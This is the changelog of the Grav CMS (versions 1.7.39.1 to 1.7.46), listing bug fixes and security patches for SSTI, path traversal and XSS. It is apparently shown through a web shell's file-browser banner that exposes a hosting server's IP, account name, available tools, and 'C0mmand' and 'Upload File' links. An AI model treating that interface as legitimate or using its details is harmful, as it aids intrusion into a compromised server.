|
Server IP : 68.65.122.142 / Your IP : 3.149.251.178 Web Server : LiteSpeed System : Linux server167.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : glenirhm ( 1318) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /var/softaculous/humhub/../moodle43/../tiki24/../grav/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# v1.7.46
## 05/15/2024
1. [](#improved)
* Better handling of external protocols in `Utils::url()` such as `mailto:`, `tel:`, etc.
* Handle `GRAV_ROOT` or `GRAV_WEBROOT` when `/` [#3667](https://github.com/getgrav/grav/pull/3667)
1. [](#bugfix)
* Fixes for multi-lang taxonomy when reinitializing the languages (e.g. LangSwitcher plugin)
* Ensure the full filepath is checked for invalid filename in `MediaUploadTrait::checkFileMetadata()`
* Fixed a bug in the `on_events` REGEX pattern of `Security::detectXss()` as it was not matching correctly.
* Fixed an issue where `read_file()` Twig function could be used nefariously in content [#GHSA-f8v5-jmfh-pr69](https://github.com/getgrav/grav/security/advisories/GHSA-f8v5-jmfh-pr69)
# v1.7.45
## 03/18/2024
1. [](#news)
* Added new Image trait for `decoding` attribute [#3796](https://github.com/getgrav/grav/pull/3796)
1. [](#bugfix)
* Fixed some multibyte issues in Inflector class [#732](https://github.com/getgrav/grav/issues/732)
* Fallback to page modified date if Page date provided is invalid and can't be parsed [getgrav/grav-plugin-admin#2394](https://github.com/getgrav/grav-plugin-admin/issues/2394)
* Fixed a path traversal vulnerability with file uploads [#GHSA-m7hx-hw6h-mqmc](https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc)
* Fixed a security issue with insecure Twig functions be processed [#GHSA-2m7x-c7px-hp58](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) [#GHSA-r6vw-8v8r-pmp4](https://github.com/getgrav/grav/security/advisories/GHSA-r6vw-8v8r-pmp4) [#GHSA-qfv4-q44r-g7rv](https://github.com/getgrav/grav/security/advisories/GHSA-qfv4-q44r-g7rv) [#GHSA-c9gp-64c4-2rrh](https://github.com/getgrav/grav/security/advisories/GHSA-c9gp-64c4-2rrh)
1. [](#improved)
* Updated composer packages
* Updated `bin/composer.phar` to latest `2.7.2`
# v1.7.44
## 01/05/2024
1. [](#new)
* Added PHP `8.3` to tests [#3782](https://github.com/getgrav/grav/pull/3782)
* Added debugger messages when Page routes conflict
* Added `ISO 8601` date format [#3721](https://github.com/getgrav/grav/pull/37210)
* Added support for `.vcf` (vCard) in media configuration [#3772](https://github.com/getgrav/grav/pull/3772)
1. [](#improved)
* Update jQuery to `v3.6.4` [#3713](https://github.com/getgrav/grav/pull/3713)
* Updated vendor libraries including Dom-Sanitizer `v1.0.7` that addresses an XSS issue
* Updated `bin/composer.phar` to latest `2.6.6`
* Updated vendor libraries to latest
* Updated language files
* Updated copyright year
1. [](#bugfix)
* Fixed a math rounding issue with number validation when using floating point steps [#3761](https://github.com/getgrav/grav/issues/3761)
* Fixed an issue with `Inflector::ordinalize()` not working as expected [#3759](https://github.com/getgrav/grav/pull/3759)
* Fixed various issues with file extension checking with dangerous extensions [#3756(https://github.com/getgrav/grav/pull/3756)]
* Fix for invalid input to foreach in `UserGroupObject` [#3724](https://github.com/getgrav/grav/pull/3724)
* Fixed exception: `Property 'jsmodule_pipeline_include_externals' does not exist in object` [#3661](https://github.com/getgrav/grav/pull/3661)
* Fixed `too few arguments exception` in FlexObjects [#3658](https://github.com/getgrav/grav/pull/3658)
# v1.7.43
## 10/02/2023
1. [](#new)
* Add the ability to programatically set a page's `modified` timestamp via a `modified:` frontmatter entry
2. [](#improved)
* Update vendor libraries
* Include `phar` in the list of `security.uploads_dangerous_extensions`
* When enabled `system.languages.debug` now dumps **Key -> Value** to debugger [#3752](https://github.com/getgrav/grav/issues/3752)
* Updated built-in composer to latest `2.6.4` [#3748](https://github.com/getgrav/grav/issues/3748)
* Added support for `@import` to ensure paths are rewritten correctly in CSS pipeline [#3750](https://github.com/getgrav/grav/pull/3750)
# v1.7.42.3
## 07/18/2023
2. [](#improved)
* Fixed a typo in `Utils::isDangerousFunction`
# v1.7.42.2
## 07/18/2023
2. [](#improved)
* In `Utils::isDangerousFunction`, handle double `\\` in `|map` twig filter to mitigate SSTI attack
* Better handle empty email in `Validatoin::typeEmail()`
# v1.7.42.1
## 06/15/2023
2. [](#improved)
* Quick fix for `isDangerousFunction` when `$name` was a closure [#3727](https://github.com/getgrav/grav/issues/3727)
# v1.7.42
## 06/14/2023
1. [](#new)
* Added a new `system.languages.debug` option that adds a `<span class="translate-debug"></span>` around strings translated with `|t`. This can be styled by the theme as needed.
1. [](#improved)
* More robust SSTI handling in `filter`, `map`, and `reduce` Twig filters and functions
* Various SSTI improvements `Utils::isDangerousFunction()`
1. [](#bugfix)
* Fixed Twig `|map()` allowing code execution
* Fixed Twig `|reduce()` allowing code execution
# v1.7.41.2
## 02/06/2023
1. [](#improved)
*Added the ability to set a configurable 'key' for the Twig Cache Tag: {% cache 'my-key' 600 %}
1. [](#bugfix)
* Fixed an issue with special characters in slug's would cause redirect loops
# v1.7.41.1
## 05/10/2023
1. [](#bugfix)
* Fixed certain UTF-8 characters breaking `Truncator` class [#3716](https://github.com/getgrav/grav/issues/3716)
# v1.7.41
## 05/09/2023
1. [](#improved)
* Removed `FILTER_SANITIZE_STRING` input filter in favor of `htmlspecialchars(strip_tags())` for PHP 8.2+
* Added `GRAV_SANITIZE_STRING` constant to replace `FILTER_SANITIZE_STRING` for PHP 8.2+
* Support non-deprecated style dynamic properties in `Parsedown` class via `ParseDownGravTrait` for PHP 8.2+
* Modified `Truncator` to not use deprecated `mb_convert_encoding()` for PHP 8.2+
* Fixed passing null into `mb_strpos()` deprecated for PHP 8.2+
* Updated internal `TwigDeferredExtension` to be PHP 8.2+ compatible
* Upgraded `getgrav/image` fork to take advantage of various PHP 8.2+ fixes
* Use `UserGroupObject::groupNames` method in blueprints for PHP 8.2+
* Comment out `files-upload` deprecated message as this is not going to be removed
* Added various public `Twig` class variables used by admin to address deprecated messages for PHP 8.2+
* Added `parse_url` to list of PHP functions supported in Twig Extension
* Added support for dynamic functions in `Parsedown` to stop deprecation messages in PHP 8.2+
# v1.7.40
## 03/22/2023
1. [](#new)
* Added a new `timestamp: true|false` option for individual assets
1. [](#improved)
* Removed outdated `xcache` setting [#3615](https://github.com/getgrav/grav/pull/3615)
* Updated `robots.txt` [#3625](https://github.com/getgrav/grav/pull/3625)
1. [](#bugfix)
* Fixed `force_ssl` redirect in case of undefined hostname [#3702](https://github.com/getgrav/grav/pull/3702)
* Fixed an issue with duplicate identical page paths
* Fixed `BlueprintSchema:flattenData` to properly handle ignored fields
* Fixed LogViewer regex greediness [#3684](https://github.com/getgrav/grav/pull/3684)
* Fixed `whoami` command [#3695](https://github.com/getgrav/grav/pull/3695)
# v1.7.39.4
## 02/22/2023
1. [](#bugfix)
* Reverted a reorganization of `account.yaml` that caused username to be disabled [admin#2344](https://github.com/getgrav/grav-plugin-admin/issues/2344)
# v1.7.39.3
## 02/21/2023
1. [](#bugfix)
* Fix for overzealous modular page template rendering fix in 1.7.39 causing Feed plugin to break [#3689](https://github.com/getgrav/grav/issues/3689)
# v1.7.39.2
## 02/20/2023
1. [](#bugfix)
* Fix for invalid session breaking Flex Accounts (when switching from Regular to Flex)
# v1.7.39.1
## 02/20/2023
1. [](#bugfix)
* Fix for broken image CSS with the latest version of DebugBar